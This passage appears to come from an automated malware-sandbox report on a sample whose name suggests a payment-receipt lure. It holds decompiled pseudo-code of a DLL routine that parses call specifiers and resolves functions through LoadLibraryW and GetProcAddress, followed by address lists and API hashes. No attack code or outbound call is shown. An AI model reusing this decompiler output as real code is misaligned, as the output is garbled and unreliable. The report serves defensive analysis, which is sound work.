                                        						if(_v32 == _t284) {
                                        							L40:
                                        							_t251 = _v32 - _t284;
                                        							__eflags = _t251;
                                        							if(_t251 == 0) {
                                        								__eflags = _t287 - 0x2a;
                                        								if(_t287 == 0x2a) {
                                        									_v36 = 2;
                                        									L61:
                                        									_t309 = _v12;
                                        									_v28 = _v24;
                                        									_t284 = 0;
                                        									__eflags = 0;
                                        									L62:
                                        									_t318 = _t309 + 2;
                                        									__eflags = _t318;
                                        									_v12 = _t318;
                                        									goto L63;
                                        								}
                                        								__eflags = _t287 - 0x2d;
                                        								if(_t287 == 0x2d) {
                                        									L131:
                                        									__eflags = _t308 - 0x2d;
                                        									if(_t308 != 0x2d) {
                                        										L134:
                                        										_t253 = _t309 + 2;
                                        										__eflags =  *_t253 - 0x3a;
                                        										if( *_t253 != 0x3a) {
                                        											L141:
                                        											_v28 =  &(_v28[0]);
                                        											 *_v28 = _t308;
                                        											goto L62;
                                        										}
                                        										__eflags = _t308 - 0x2d;
                                        										if(_t308 == 0x2d) {
                                        											goto L141;
                                        										}
                                        										_v36 = 1;
                                        										L137:
                                        										_v12 = _t253;
                                        										__eflags = _v28 - _v24;
                                        										if(_v28 <= _v24) {
                                        											 *_v44 = _t284;
                                        										} else {
                                        											 *_v28 = _t284;
                                        											lstrcpyW(_v44, _v24);
                                        										}
                                        										goto L61;
                                        									}
                                        									_t253 = _t309 + 2;
                                        									__eflags =  *_t253 - 0x3e;
                                        									if( *_t253 != 0x3e) {
                                        										goto L134;
                                        									}
                                        									_v36 = 3;
                                        									goto L137;
                                        								}
                                        								__eflags = _t287 - 0x3a;
                                        								if(_t287 != 0x3a) {
                                        									goto L141;
                                        								}
                                        								goto L131;
                                        							}
                                        							_t259 = _t251 - 1;
                                        							__eflags = _t259;
                                        							if(_t259 == 0) {
                                        								L74:
                                        								_t260 = _t287 - 0x22;
                                        								__eflags = _t260 - 0x55;
                                        								if(_t260 > 0x55) {
                                        									goto L61;
                                        								}
                                        								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
                                        									case 0:
                                        										__ecx = _v24;
                                        										__edi = _v12;
                                        										while(1) {
                                        											__edi = __edi + 1;
                                        											__edi = __edi + 1;
                                        											_v12 = __edi;
                                        											__ax =  *__edi;
                                        											__eflags = __ax - __dx;
                                        											if(__ax != __dx) {
                                        												goto L116;
                                        											}
                                        											L115:
                                        											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                        											if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                        												L120:
                                        												 *__ecx =  *__ecx & 0x00000000;
                                        												__ebx = E1000122C(_v24);
                                        												goto L91;
                                        											}
                                        											L116:
                                        											__eflags = __ax;
                                        											if(__ax == 0) {
                                        												goto L120;
                                        											}
                                        											__eflags = __ax - __dx;
                                        											if(__ax == __dx) {
                                        												__edi = __edi + 1;
                                        												__edi = __edi + 1;
                                        												__eflags = __edi;
                                        											}
                                        											__ax =  *__edi;
                                        											 *__ecx =  *__edi;
                                        											__ecx = __ecx + 1;
                                        											__ecx = __ecx + 1;
                                        											__edi = __edi + 1;
                                        											__edi = __edi + 1;
                                        											_v12 = __edi;
                                        											__ax =  *__edi;
                                        											__eflags = __ax - __dx;
                                        											if(__ax != __dx) {
                                        												goto L116;
                                        											}
                                        											goto L115;
                                        										}
                                        									case 1:
                                        										_v8 = 1;
                                        										goto L61;
                                        									case 2:
                                        										_v8 = _v8 | 0xffffffff;
                                        										goto L61;
                                        									case 3:
                                        										_v8 = _v8 & 0x00000000;
                                        										_v20 = _v20 & 0x00000000;
                                        										_v16 = _v16 + 1;
                                        										goto L79;
                                        									case 4:
                                        										__eflags = _v20;
                                        										if(_v20 != 0) {
                                        											goto L61;
                                        										}
                                        										_v12 = _v12 - 2;
                                        										__ebx = E1000121B();
                                        										 &_v12 = E10001A9F( &_v12);
                                        										__eax = E10001470(__edx, __eax, __edx, __ebx);
                                        										goto L91;
                                        									case 5:
                                        										L99:
                                        										_v20 = _v20 + 1;
                                        										goto L61;
                                        									case 6:
                                        										_push(7);
                                        										goto L107;
                                        									case 7:
                                        										_push(0x19);
                                        										goto L127;
                                        									case 8:
                                        										_push(0x15);
                                        										goto L127;
                                        									case 9:
                                        										_push(0x16);
                                        										goto L127;
                                        									case 0xa:
                                        										_push(0x18);
                                        										goto L127;
                                        									case 0xb:
                                        										_push(5);
                                        										goto L107;
                                        									case 0xc:
                                        										__eax = 0;
                                        										__eax = 1;
                                        										goto L85;
                                        									case 0xd:
                                        										_push(6);
                                        										goto L107;
                                        									case 0xe:
                                        										_push(2);
                                        										goto L107;
                                        									case 0xf:
                                        										_push(3);
                                        										goto L107;
                                        									case 0x10:
                                        										_push(0x17);
                                        										L127:
                                        										_pop(__ebx);
                                        										goto L92;
                                        									case 0x11:
                                        										__eax =  &_v12;
                                        										__eax = E10001A9F( &_v12);
                                        										__ebx = __eax;
                                        										__ebx = __eax + 1;
                                        										__eflags = __ebx - 0xb;
                                        										if(__ebx < 0xb) {
                                        											__ebx = __ebx + 0xa;
                                        										}
                                        										goto L91;
                                        									case 0x12:
                                        										__ebx = 0xffffffff;
                                        										goto L92;
                                        									case 0x13:
                                        										_v48 = _v48 + 1;
                                        										_push(4);
                                        										_pop(__eax);
                                        										goto L85;
                                        									case 0x14:
                                        										__eax = 0;
                                        										__eflags = 0;
                                        										goto L85;
                                        									case 0x15:
                                        										_push(4);
                                        										L107:
                                        										_pop(__eax);
                                        										L85:
                                        										__edi = _v16;
                                        										__ecx =  *(0x1000305c + __eax * 4);
                                        										__edi = _v16 << 5;
                                        										__edx = 0;
                                        										__edi = (_v16 << 5) + __esi;
                                        										__edx = 1;
                                        										__eflags = _v8 - 0xffffffff;
                                        										_v40 = 1;
                                        										 *(__edi + 0x1018) = __eax;
                                        										if(_v8 == 0xffffffff) {
                                        											L87:
                                        											__ecx = __edx;
                                        											L88:
                                        											__eflags = _v8 - __edx;
                                        											 *(__edi + 0x1028) = __ecx;
                                        											if(_v8 == __edx) {
                                        												__eax =  &_v12;
                                        												__eax = E10001A9F( &_v12);
                                        												__eax = __eax + 1;
                                        												__eflags = __eax;
                                        												_v8 = __eax;
                                        											}
                                        											__eax = _v8;
                                        											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                        											_t133 = _v16 + 0x81; // 0x81
                                        											_t133 = _t133 << 5;
                                        											__eax = 0;
                                        											__eflags = 0;
                                        											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
                                        											 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                        											 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                        											goto L91;
                                        										}
                                        										__eflags = __ecx;
                                        										if(__ecx > 0) {
                                        											goto L88;
                                        										}
                                        										goto L87;
                                        									case 0x16:
                                        										_t262 =  *(_t319 + 0x1014);
                                        										__eflags = _t262 - _v16;
                                        										if(_t262 > _v16) {
                                        											_v16 = _t262;
                                        										}
                                        										_v8 = _v8 & 0x00000000;
                                        										_v20 = _v20 & 0x00000000;
                                        										_v36 - 3 = _t262 - (_v36 == 3);
                                        										if(_t262 != _v36 == 3) {
                                        											L79:
                                        											_v40 = 1;
                                        										}
                                        										goto L61;
                                        									case 0x17:
                                        										__eax =  &_v12;
                                        										__eax = E10001A9F( &_v12);
                                        										__ebx = __eax;
                                        										__ebx = __eax + 1;
                                        										L91:
                                        										__eflags = __ebx;
                                        										if(__ebx == 0) {
                                        											goto L61;
                                        										}
                                        										L92:
                                        										__eflags = _v20;
                                        										_v40 = 1;
                                        										if(_v20 != 0) {
                                        											L97:
                                        											__eflags = _v20 - 1;
                                        											if(_v20 == 1) {
                                        												__eax = _v16;
                                        												__eax = _v16 << 5;
                                        												__eflags = __eax;
                                        												 *(__eax + __esi + 0x102c) = __ebx;
                                        											}
                                        											goto L99;
                                        										}
                                        										_v16 = _v16 << 5;
                                        										_t141 = __esi + 0x1030; // 0x1030
                                        										__edi = (_v16 << 5) + _t141;
                                        										__eax =  *__edi;
                                        										__eflags = __eax - 0xffffffff;
                                        										if(__eax <= 0xffffffff) {
                                        											L95:
                                        											__eax = GlobalFree(__eax);
                                        											L96:
                                        											 *__edi = __ebx;
                                        											goto L97;
                                        										}
                                        										__eflags = __eax - 0x19;
                                        										if(__eax <= 0x19) {
                                        											goto L96;
                                        										}
                                        										goto L95;
                                        									case 0x18:
                                        										goto L61;
                                        								}
                                        							}
                                        							_t263 = _t259 - 1;
                                        							__eflags = _t263;
                                        							if(_t263 == 0) {
                                        								_v16 = _t284;
                                        								goto L74;
                                        							}
                                        							__eflags = _t263 != 1;
                                        							if(_t263 != 1) {
                                        								goto L141;
                                        							}
                                        							_t266 = _t287 - 0x21;
                                        							__eflags = _t266;
                                        							if(_t266 == 0) {
                                        								_v8 =  ~_v8;
                                        								goto L61;
                                        							}
                                        							_t267 = _t266 - 0x42;
                                        							__eflags = _t267;
                                        							if(_t267 == 0) {
                                        								L57:
                                        								__eflags = _v8 - 1;
                                        								if(_v8 != 1) {
                                        									_t92 = _t319 + 0x1010;
                                        									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
                                        									__eflags =  *_t92;
                                        								} else {
                                        									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
                                        								}
                                        								_v8 = 1;
                                        								goto L61;
                                        							}
                                        							_t272 = _t267;
                                        							__eflags = _t272;
                                        							if(_t272 == 0) {
                                        								_push(0x20);
                                        								L56:
                                        								_pop(1);
                                        								goto L57;
                                        							}
                                        							_t273 = _t272 - 9;
                                        							__eflags = _t273;
                                        							if(_t273 == 0) {
                                        								_push(8);
                                        								goto L56;
                                        							}
                                        							_t274 = _t273 - 4;
                                        							__eflags = _t274;
                                        							if(_t274 == 0) {
                                        								_push(4);
                                        								goto L56;
                                        							}
                                        							_t275 = _t274 - 1;
                                        							__eflags = _t275;
                                        							if(_t275 == 0) {
                                        								_push(0x10);
                                        								goto L56;
                                        							}
                                        							__eflags = _t275 != 0;
                                        							if(_t275 != 0) {
                                        								goto L61;
                                        							}
                                        							_push(0x40);
                                        							goto L56;
                                        						}
                                        						goto L15;
                                        					}
                                        					_t278 = _t249 - 5;
                                        					if(_t278 == 0) {
                                        						__eflags = _v36 - 3;
                                        						_v32 = 1;
                                        						_v8 = _t284;
                                        						_v20 = _t284;
                                        						_v16 = (0 | _v36 == 0x00000003) + 1;
                                        						_v40 = _t284;
                                        						goto L17;
                                        					}
                                        					_t282 = _t278 - 1;
                                        					if(_t282 == 0) {
                                        						_v32 = 2;
                                        						_v8 = _t284;
                                        						_v20 = _t284;
                                        						goto L17;
                                        					}
                                        					if(_t282 != 0x16) {
                                        						goto L40;
                                        					} else {
                                        						_v32 = 3;
                                        						_v8 = 1;
                                        						goto L17;
                                        					}
                                        				}
                                        				GlobalFree(_v52);
                                        				GlobalFree(_v24);
                                        				GlobalFree(_v44);
                                        				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
                                        					L161:
                                        					return _t319;
                                        				} else {
                                        					_t216 =  *_t319 - 1;
                                        					if(_t216 == 0) {
                                        						_t178 = _t319 + 8; // 0x8
                                        						_t312 = _t178;
                                        						__eflags =  *_t312 - _t284;
                                        						if( *_t312 != _t284) {
                                        							_t217 = GetModuleHandleW(_t312);
                                        							__eflags = _t217 - _t284;
                                        							 *(_t319 + 0x1008) = _t217;
                                        							if(_t217 != _t284) {
                                        								L150:
                                        								_t183 = _t319 + 0x808; // 0x808
                                        								_t313 = _t183;
                                        								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
                                        								__eflags = _t218 - _t284;
                                        								 *(_t319 + 0x100c) = _t218;
                                        								if(_t218 == _t284) {
                                        									__eflags =  *_t313 - 0x23;
                                        									if( *_t313 == 0x23) {
                                        										_t186 = _t319 + 0x80a; // 0x80a
                                        										_t222 = E10001311(_t186);
                                        										__eflags = _t222 - _t284;
                                        										if(_t222 != _t284) {
                                        											__eflags = _t222 & 0xffff0000;
                                        											if((_t222 & 0xffff0000) == 0) {
                                        												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
                                        											}
                                        										}
                                        									}
                                        								}
                                        								__eflags = _v48 - _t284;
                                        								if(_v48 != _t284) {
                                        									L157:
                                        									_t313[lstrlenW(_t313)] = 0x57;
                                        									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
                                        									__eflags = _t220 - _t284;
                                        									if(_t220 != _t284) {
                                        										L145:
                                        										 *(_t319 + 0x100c) = _t220;
                                        										goto L161;
                                        									}
                                        									__eflags =  *(_t319 + 0x100c) - _t284;
                                        									L159:
                                        									if(__eflags != 0) {
                                        										goto L161;
                                        									}
                                        									L160:
                                        									_t197 = _t319 + 4;
                                        									 *_t197 =  *(_t319 + 4) | 0xffffffff;
                                        									__eflags =  *_t197;
                                        									goto L161;
                                        								} else {
                                        									__eflags =  *(_t319 + 0x100c) - _t284;
                                        									if( *(_t319 + 0x100c) != _t284) {
                                        										goto L161;
                                        									}
                                        									goto L157;
                                        								}
                                        							}
                                        							_t225 = LoadLibraryW(_t312);
                                        							__eflags = _t225 - _t284;
                                        							 *(_t319 + 0x1008) = _t225;
                                        							if(_t225 == _t284) {
                                        								goto L160;
                                        							}
                                        							goto L150;
                                        						}
                                        						_t179 = _t319 + 0x808; // 0x808
                                        						_t227 = E10001311(_t179);
                                        						 *(_t319 + 0x100c) = _t227;
                                        						__eflags = _t227 - _t284;
                                        						goto L159;
                                        					}
                                        					_t228 = _t216 - 1;
                                        					if(_t228 == 0) {
                                        						_t176 = _t319 + 0x808; // 0x808
                                        						_t229 = _t176;
                                        						__eflags =  *_t229 - _t284;
                                        						if( *_t229 == _t284) {
                                        							goto L161;
                                        						}
                                        						_t220 = E10001311(_t229);
                                        						L144:
                                        						goto L145;
                                        					}
                                        					if(_t228 != 1) {
                                        						goto L161;
                                        					}
                                        					_t80 = _t319 + 8; // 0x8
                                        					_t285 = _t80;
                                        					_t314 = E10001311(_t80);
                                        					 *(_t319 + 0x1008) = _t314;
                                        					if(_t314 == 0) {
                                        						goto L160;
                                        					}
                                        					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
                                        					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
                                        					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
                                        					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
                                        					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
                                        					_t89 = _t319 + 0x808; // 0x808
                                        					_t220 =  *(_t314->i + E10001311(_t89) * 4);
                                        					goto L144;
                                        				}
                                        			}































































                                        0x10001b20
                                        0x10001b23
                                        0x10001b26
                                        0x10001b29
                                        0x10001b2c
                                        0x10001b2f
                                        0x10001b32
                                        0x10001b34
                                        0x10001b37
                                        0x10001b3c
                                        0x10001b3f
                                        0x10001b47
                                        0x10001b4f
                                        0x10001b51
                                        0x10001b54
                                        0x10001b5c
                                        0x10001b5c
                                        0x10001b61
                                        0x10001b64
                                        0x00000000
                                        0x00000000
                                        0x10001b6e
                                        0x10001b71
                                        0x10001b76
                                        0x10001b78
                                        0x10001beb
                                        0x10001beb
                                        0x10001beb
                                        0x10001bef
                                        0x10001bf2
                                        0x10001bf4
                                        0x10001c16
                                        0x10001c18
                                        0x10001c1b
                                        0x10001c2a
                                        0x10001c2c
                                        0x10001c32
                                        0x10001c32
                                        0x10001c38
                                        0x10001c3b
                                        0x10001c3b
                                        0x10001c3e
                                        0x10001c3e
                                        0x10001c44
                                        0x10001c46
                                        0x10001c46
                                        0x10001c48
                                        0x10001c4b
                                        0x10001c4e
                                        0x10001c54
                                        0x10001c5a
                                        0x10001c5d
                                        0x10001c81
                                        0x10001c84
                                        0x00000000
                                        0x00000000
                                        0x10001c87
                                        0x10001c89
                                        0x10001c97
                                        0x10001c9a
                                        0x10001c9c
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x10001c9e
                                        0x10001c9e
                                        0x10001c9e
                                        0x10001ca4
                                        0x10001ca6
                                        0x00000000
                                        0x00000000
                                        0x10001ca8
                                        0x10001caa
                                        0x10001cac
                                        0x10001cae
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x10001cae
                                        0x10001cb0
                                        0x10001cb2
                                        0x10001cb4
                                        0x10001cb4
                                        0x10001cba
                                        0x10001cc0
                                        0x10001cc2
                                        0x10001cd6
                                        0x10001cd6
                                        0x10001cd8
                                        0x10001cc4
                                        0x10001cca
                                        0x10001ccd
                                        0x10001ccd
                                        0x00000000
                                        0x10001c5f
                                        0x10001c5f
                                        0x10001c5f
                                        0x10001c60
                                        0x10001c68
                                        0x10001c6c
                                        0x10001c72
                                        0x10001c76
                                        0x10001cde
                                        0x10001ce1
                                        0x10001ce5
                                        0x10001d70
                                        0x10001d74
                                        0x10001b59
                                        0x00000000
                                        0x10001b59
                                        0x00000000
                                        0x10001d74
                                        0x10001c62
                                        0x10001c62
                                        0x10001c63
                                        0x00000000
                                        0x00000000
                                        0x10001c65
                                        0x10001c66
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x10001c66
                                        0x10001c5d
                                        0x10001bf7
                                        0x00000000
                                        0x00000000
                                        0x10001c00
                                        0x10001c03
                                        0x10001c10
                                        0x10001c10
                                        0x10001c05
                                        0x00000000
                                        0x10001c05
                                        0x10001b7a
                                        0x10001b7d
                                        0x10001bce
                                        0x10001bd1
                                        0x10001be3
                                        0x10001be3
                                        0x10001be6
                                        0x00000000
                                        0x10001be6
                                        0x10001bd3
                                        0x10001bd8
                                        0x00000000
                                        0x00000000
                                        0x10001bda
                                        0x10001bdd
                                        0x10001ced
                                        0x10001cf0
                                        0x10001cf0
                                        0x10001cf2
                                        0x10002048
                                        0x1000204b
                                        0x100020b2
                                        0x10001d60
                                        0x10001d63
                                        0x10001d66
                                        0x10001d69
                                        0x10001d69
                                        0x10001d6b
                                        0x10001d6c
                                        0x10001d6c
                                        0x10001d6d
                                        0x00000000
                                        0x10001d6d
                                        0x1000204d
                                        0x10002050
                                        0x10002057
                                        0x10002057
                                        0x1000205b
                                        0x1000206f
                                        0x1000206f
                                        0x10002072
                                        0x10002076
                                        0x100020be
                                        0x100020c1
                                        0x100020c5
                                        0x00000000
                                        0x100020c5
                                        0x10002078
                                        0x1000207c
                                        0x00000000
                                        0x00000000
                                        0x1000207e
                                        0x10002085
                                        0x10002085
                                        0x1000208b
                                        0x1000208e
                                        0x100020aa
                                        0x10002090
                                        0x10002099
                                        0x1000209c
                                        0x1000209c
                                        0x00000000
                                        0x1000208e
                                        0x1000205d
                                        0x10002060
                                        0x10002064
                                        0x00000000
                                        0x00000000
                                        0x10002066
                                        0x00000000
                                        0x10002066
                                        0x10002052
                                        0x10002055
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x10002055
                                        0x10001cf8
                                        0x10001cf8
                                        0x10001cf9
                                        0x10001e29
                                        0x10001e29
                                        0x10001e2e
                                        0x10001e31
                                        0x00000000
                                        0x00000000
                                        0x10001e3e
                                        0x00000000
                                        0x10001fe5
                                        0x10001fe8
                                        0x10001feb
                                        0x10001feb
                                        0x10001fec
                                        0x10001fed
                                        0x10001ff0
                                        0x10001ff3
                                        0x10001ff6
                                        0x00000000
                                        0x00000000
                                        0x10001ff8
                                        0x10001ff8
                                        0x10001ffc
                                        0x10002014
                                        0x10002017
                                        0x10002021
                                        0x00000000
                                        0x10002021
                                        0x10001ffe
                                        0x10001ffe
                                        0x10002001
                                        0x00000000
                                        0x00000000
                                        0x10002003
                                        0x10002006
                                        0x10002008
                                        0x10002009
                                        0x10002009
                                        0x10002009
                                        0x1000200a
                                        0x1000200d
                                        0x10002010
                                        0x10002011
                                        0x10001feb
                                        0x10001fec
                                        0x10001fed
                                        0x10001ff0
                                        0x10001ff3
                                        0x10001ff6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x10001ff6
                                        0x00000000
                                        0x10001e85
                                        0x00000000
                                        0x00000000
                                        0x10001e91
                                        0x00000000
                                        0x00000000
                                        0x10001e78
                                        0x10001e7c
                                        0x10001e80
                                        0x00000000
                                        0x00000000
                                        0x10001fb6
                                        0x10001fba
                                        0x00000000
                                        0x00000000
                                        0x10001fc0
                                        0x10001fc9
                                        0x10001fd0
                                        0x10001fd8
                                        0x00000000
                                        0x00000000
                                        0x10001f53
                                        0x10001f53
                                        0x00000000
                                        0x00000000
                                        0x10001e9a
                                        0x00000000
                                        0x00000000
                                        0x10002040
                                        0x00000000
                                        0x00000000
                                        0x10002030
                                        0x00000000
                                        0x00000000
                                        0x10002034
                                        0x00000000
                                        0x00000000
                                        0x1000203c
                                        0x00000000
                                        0x00000000
                                        0x10001f76
                                        0x00000000
                                        0x00000000
                                        0x10001f5b
                                        0x10001f5d
                                        0x00000000
                                        0x00000000
                                        0x10001f7e
                                        0x00000000
                                        0x00000000
                                        0x10001f63
                                        0x00000000
                                        0x00000000
                                        0x10001f67
                                        0x00000000
                                        0x00000000
                                        0x10002038
                                        0x10002042
                                        0x10002042
                                        0x00000000
                                        0x00000000
                                        0x10001f86
                                        0x10001f8a
                                        0x10001f8f
                                        0x10001f92
                                        0x10001f93
                                        0x10001f96
                                        0x10001f9c
                                        0x10001f9c
                                        0x00000000
                                        0x00000000
                                        0x10002028
                                        0x00000000
                                        0x00000000
                                        0x10001f6b
                                        0x10001f6e
                                        0x10001f70
                                        0x00000000
                                        0x00000000
                                        0x10001ea1
                                        0x10001ea1
                                        0x00000000
                                        0x00000000
                                        0x10001f7a
                                        0x10001f80
                                        0x10001f80
                                        0x10001ea3
                                        0x10001ea3
                                        0x10001ea6
                                        0x10001ead
                                        0x10001eb0
                                        0x10001eb2
                                        0x10001eb4
                                        0x10001eb5
                                        0x10001eb9
                                        0x10001ebc
                                        0x10001ec2
                                        0x10001ec8
                                        0x10001ec8
                                        0x10001eca
                                        0x10001eca
                                        0x10001ecd
                                        0x10001ed3
                                        0x10001ed5
                                        0x10001ed9
                                        0x10001ede
                                        0x10001ede
                                        0x10001ee0
                                        0x10001ee0
                                        0x10001ee3
                                        0x10001ee6
                                        0x10001eef
                                        0x10001ef5
                                        0x10001ef8
                                        0x10001ef8
                                        0x10001efa
                                        0x10001efd
                                        0x10001f03
                                        0x00000000
                                        0x10001f03
                                        0x10001ec4
                                        0x10001ec6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x10001e45
                                        0x10001e4b
                                        0x10001e4e
                                        0x10001e50
                                        0x10001e50
                                        0x10001e53
                                        0x10001e57
                                        0x10001e64
                                        0x10001e66
                                        0x10001e6c
                                        0x10001e6c
                                        0x10001e6c
                                        0x00000000
                                        0x00000000
                                        0x10001fa4
                                        0x10001fa8
                                        0x10001fad
                                        0x10001fb0
                                        0x10001f09
                                        0x10001f09
                                        0x10001f0b
                                        0x00000000
                                        0x00000000
                                        0x10001f11
                                        0x10001f11
                                        0x10001f15
                                        0x10001f1c
                                        0x10001f40
                                        0x10001f40
                                        0x10001f44
                                        0x10001f46
                                        0x10001f49
                                        0x10001f49
                                        0x10001f4c
                                        0x10001f4c
                                        0x00000000
                                        0x10001f44
                                        0x10001f21
                                        0x10001f24
                                        0x10001f24
                                        0x10001f2b
                                        0x10001f2d
                                        0x10001f30
                                        0x10001f37
                                        0x10001f38
                                        0x10001f3e
                                        0x10001f3e
                                        0x00000000
                                        0x10001f3e
                                        0x10001f32
                                        0x10001f35
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x10001e3e
                                        0x10001cff
                                        0x10001cff
                                        0x10001d00
                                        0x10001e26
                                        0x00000000
                                        0x10001e26
                                        0x10001d06
                                        0x10001d07
                                        0x00000000
                                        0x00000000
                                        0x10001d0f
                                        0x10001d0f
                                        0x10001d12
                                        0x10001d5d
                                        0x00000000
                                        0x10001d5d
                                        0x10001d14
                                        0x10001d14
                                        0x10001d17
                                        0x10001d41
                                        0x10001d44
                                        0x10001d47
                                        0x10001e18
                                        0x10001e18
                                        0x10001e18
                                        0x10001d4d
                                        0x10001d4d
                                        0x10001d4d
                                        0x10001e1e
                                        0x00000000
                                        0x10001e1e
                                        0x10001d1a
                                        0x10001d1a
                                        0x10001d1b
                                        0x10001d3e
                                        0x10001d40
                                        0x10001d40
                                        0x00000000
                                        0x10001d40
                                        0x10001d1d
                                        0x10001d1d
                                        0x10001d20
                                        0x10001d3a
                                        0x00000000
                                        0x10001d3a
                                        0x10001d22
                                        0x10001d22
                                        0x10001d25
                                        0x10001d36
                                        0x00000000
                                        0x10001d36
                                        0x10001d27
                                        0x10001d27
                                        0x10001d28
                                        0x10001d32
                                        0x00000000
                                        0x10001d32
                                        0x10001d2b
                                        0x10001d2c
                                        0x00000000
                                        0x00000000
                                        0x10001d2e
                                        0x00000000
                                        0x10001d2e
                                        0x00000000
                                        0x10001bdd
                                        0x10001b7f
                                        0x10001b82
                                        0x10001bb1
                                        0x10001bb5
                                        0x10001bbc
                                        0x10001bc3
                                        0x10001bc6
                                        0x10001bc9
                                        0x00000000
                                        0x10001bc9
                                        0x10001b84
                                        0x10001b85
                                        0x10001ba0
                                        0x10001ba7
                                        0x10001baa
                                        0x00000000
                                        0x10001baa
                                        0x10001b8a
                                        0x00000000
                                        0x10001b90
                                        0x10001b90
                                        0x10001b97
                                        0x00000000
                                        0x10001b97
                                        0x10001b8a
                                        0x10001d83
                                        0x10001d88
                                        0x10001d8d
                                        0x10001d91
                                        0x100021c5
                                        0x100021cb
                                        0x10001da3
                                        0x10001da5
                                        0x10001da6
                                        0x100020ee
                                        0x100020ee
                                        0x100020f1
                                        0x100020f4
                                        0x10002111
                                        0x10002117
                                        0x10002119
                                        0x1000211f
                                        0x10002136
                                        0x10002136
                                        0x10002136
                                        0x10002143
                                        0x10002149
                                        0x1000214c
                                        0x10002152
                                        0x10002154
                                        0x10002158
                                        0x1000215a
                                        0x10002161
                                        0x10002166
                                        0x10002169
                                        0x1000216b
                                        0x10002170
                                        0x10002182
                                        0x10002182
                                        0x10002170
                                        0x10002169
                                        0x10002158
                                        0x10002188
                                        0x1000218b
                                        0x10002195
                                        0x1000219d
                                        0x100021aa
                                        0x100021b0
                                        0x100021b3
                                        0x100020e3
                                        0x100020e3
                                        0x00000000
                                        0x100020e3
                                        0x100021b9
                                        0x100021bf
                                        0x100021bf
                                        0x00000000
                                        0x00000000
                                        0x100021c1
                                        0x100021c1
                                        0x100021c1
                                        0x100021c1
                                        0x00000000
                                        0x1000218d
                                        0x1000218d
                                        0x10002193
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x10002193
                                        0x1000218b
                                        0x10002122
                                        0x10002128
                                        0x1000212a
                                        0x10002130
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x10002130
                                        0x100020f6
                                        0x100020fd
                                        0x10002103
                                        0x10002109
                                        0x00000000
                                        0x10002109
                                        0x10001dac
                                        0x10001dad
                                        0x100020cd
                                        0x100020cd
                                        0x100020d3
                                        0x100020d6
                                        0x00000000
                                        0x00000000
                                        0x100020dd
                                        0x100020e2
                                        0x00000000
                                        0x100020e2
                                        0x10001db4
                                        0x00000000
                                        0x00000000
                                        0x10001dba
                                        0x10001dba
                                        0x10001dc3
                                        0x10001dc8
                                        0x10001dce
                                        0x00000000
                                        0x00000000
                                        0x10001dd4
                                        0x10001de1
                                        0x10001de7
                                        0x10001df1
                                        0x10001df7
                                        0x10001dff
                                        0x10001e0f
                                        0x00000000
                                        0x10001e0f

                                        APIs
                                          • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                        • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                        • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                        • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                        • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                        • GlobalFree.KERNEL32(?), ref: 10001D83
                                        • GlobalFree.KERNEL32(?), ref: 10001D88
                                        • GlobalFree.KERNEL32(?), ref: 10001D8D
                                        • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                        • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2886044792.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000002.00000002.2886017389.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2886076658.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2886121541.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_10000000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Global$Free$lstrcpy$Alloc
                                        • String ID:
                                        • API String ID: 4227406936-0
                                        • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                        • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                        • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                        • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 67%
                                        			E004020FE() {
                                        				signed int _t52;
                                        				void* _t56;
                                        				intOrPtr* _t60;
                                        				intOrPtr _t61;
